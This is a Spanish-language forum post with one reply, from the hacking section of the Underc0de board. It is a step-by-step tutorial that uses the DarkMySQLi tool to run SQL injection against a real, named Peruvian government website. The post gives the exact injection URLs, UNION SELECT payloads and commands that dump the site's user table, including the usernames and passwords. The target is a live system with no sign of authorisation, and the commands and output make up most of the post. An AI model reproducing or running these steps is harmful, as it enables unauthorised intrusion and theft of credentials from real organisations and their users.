Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: BrowserNet en Diciembre 07, 2016, 03:25:07 AM

Título: SQL Inyeccion con DarkMySQLi
Publicado por: BrowserNet en Diciembre 07, 2016, 03:25:07 AM
(https://4.bp.blogspot.com/-l3jXrhdJBz4/U1FeY5jWboI/AAAAAAAAAwk/MtZs_XOy8DI/s1600/Picture1.png)

DarkMySQLi es una herramienta de código abierto creada en python, que nos permite elaborar un ataque de SQL INJECTION de forma automátizada y extraer la información de las base de datos de una web.

Link de descarga : https://www.mediafire.com/?72fcrfb2mzy16mc (https://www.mediafire.com/?72fcrfb2mzy16mc)
Vamos a la acción

(https://1.bp.blogspot.com/-XviX1U-rG7o/U1Fc_50XDuI/AAAAAAAAAwY/F8pGejshm9c/s1600/Sin+t%C3%ADtulo.png)

El primer paso que haremos primero sera encontrar la web vulnerable en este caso utilizare la siguiente :

http://www.regionsanmartin.gob.pe/institucional/ini.php?Area='3

Ejecutaremos el siguiente comando para el testeo de la web :

Código [Seleccionar]
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3" --findcol

(https://2.bp.blogspot.com/-zi72hTu5iZc/U1bhCnzq6ZI/AAAAAAAAAyM/fRkwJnyY9r8/s1600/Sin+t%C3%ADtulo.png)

como vemos nos voto la información principal para saber si es vulnerable a la Inyección DarkMySQLi  :

[!] darkMySQLi URL: http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de--

luego que sabemos que es vulnerable a la inyección pondremos el siguiente:

Código [Seleccionar]
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --full

(solo reemplazamos el numero " 3 " por " darkc0de "

(https://4.bp.blogspot.com/-MzMnOLv5pNQ/U1bjeZxYuPI/AAAAAAAAAyY/TlFu7U-4Z9E/s1600/Sin+t%C3%ADtulo.png)
(https://1.bp.blogspot.com/-ZtUIq4WX53s/U1bj7iguOfI/AAAAAAAAAyg/4G718pL-jso/s1600/Sin+t%C3%ADtulo.png)

Como vemos nos a votado las columnas de las base de datos clasificándolas por cada uno de ellas en sus respectivas "tablas" de manera que podamos identificarlos fácilmente los datos almacenados.

Lo que haremos a continuación sera dumpear las columnas de los usuarios:

Código [Seleccionar]
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --dump -D regionsanmartin_gob_pe -T usuarios -C nomb_usuario,pass,tipo_usuario

(https://1.bp.blogspot.com/-1Y3wdikQN9I/U1bnOZXMJdI/AAAAAAAAAys/BqLN2Tk_Jjo/s1600/Sin+t%C3%ADtulo.png)

Imagen completa de usuarios

(https://3.bp.blogspot.com/-wE_rbMP9OJ0/U1bnrspzaMI/AAAAAAAAAy0/uUrcpcRLXvU/s1600/Sin+t%C3%ADtulo.png)

Espero les aya gustado mucho el Post, un saludo y un abrazo desde PERU"
Título: Re:SQL Inyeccion con DarkMySQLi
Publicado por: Dr4g0n4Y en Diciembre 07, 2016, 04:21:02 AM
Gracias Browsernet me encantan leer tus entradas, es bueno tener alternativas para este tipo de ataques, saludos hasta Perú desde México

Enviado desde mi HTC One mediante Tapatalk

Sólo texto | Texto con Imágenes